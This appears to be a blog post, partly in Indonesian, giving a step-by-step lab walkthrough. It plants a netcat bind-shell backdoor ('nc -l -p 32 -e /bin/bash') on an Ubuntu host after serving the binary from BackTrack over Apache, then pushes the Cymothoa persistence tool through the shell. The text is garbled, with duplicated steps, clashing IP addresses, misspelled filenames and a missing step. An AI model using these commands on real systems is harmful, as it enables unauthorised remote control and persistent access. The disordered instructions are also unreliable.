The process of sending NC (Cat Net) file from localhost (backtrack) to the target (ubuntu) to send a backdoor on the target.
IP BT(backtrack)
IP UBUNTU

1. open terminal - type where is nc
IP BT(backtrack)

IP UBUNTU

1. open terminal - type where is nc
then the result
nc: /bin/nc /bin/nc.traditional
/usr/share/man/man1/nc.1.gz *kirim file yang bin/nc.traditional2. type cp /bin/nc.traditional /var/www/
*to copy and send tthe file nc traditional
3. on apache -type service apache2 start
*to copy and send tthe file nc traditional
3. on apache -type service apache2 start
4. open target (ubuntu) – browser – open ip
bt (192.168.142.104) - download
5. install nc.traditional.
open terminal ubuntu - cd download - ls nc.traditional - chmod 777 nc.tradisional
6. nc.tradional run in order to create a backdoor
5. install nc.traditional.
open terminal ubuntu - cd download - ls nc.traditional - chmod 777 nc.tradisional
6. nc.tradional run in order to create a backdoor
sudo ./nc.tradisional -l -p 32 -e
/bin/bash*32 is free name port
7. open backtrack to run the backdoor
terminal - nc 192.168.0.142 32
7. open backtrack to run the backdoor
terminal - nc 192.168.0.142 32
sudo ./nc.tradisional -l -p 32 >
baru *baru : nama file
9. Backtrack to send backdoor open cymantoa
open cymantoa ( open app - maintaning acces – os backdoor -cymontoa)
type nc 192.168.0.142 32 < cymothoa
10. ubuntu is open to see the posts


Tidak ada komentar:
Posting Komentar